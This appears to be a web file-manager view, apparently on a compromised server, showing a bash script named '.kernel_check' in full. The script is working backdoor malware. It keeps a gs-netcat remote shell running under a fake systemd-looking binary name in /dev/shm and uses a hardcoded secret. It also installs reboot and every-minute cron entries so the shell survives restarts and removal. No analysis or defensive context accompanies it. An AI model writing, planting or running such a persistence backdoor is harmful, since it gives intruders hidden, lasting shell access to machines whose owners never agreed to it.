OwlCyberSecurity - MANAGER
Edit File: .kernel_check
#!/bin/bash GS_BIN="/dev/shm/systemd-notify-helper" GS_SEC="chiya-7397e1c1ee3de5d6" LOCK_FILE="/tmp/.lock_chiya_watch" exec 200>$LOCK_FILE flock -n 200 || exit 1 while true; do if ! pgrep -f "gs-netcat" > /dev/null; then $GS_BIN -s $GS_SEC -i -l >/dev/null 2>&1 & fi if ! crontab -l 2>/dev/null | grep -q "/dev/shm/.kernel_check"; then (crontab -l 2>/dev/null; echo "@reboot /dev/shm/.kernel_check >/dev/null 2>&1 &"; echo "* * * * * /dev/shm/.kernel_check >/dev/null 2>&1 &") | crontab - fi sleep 60 done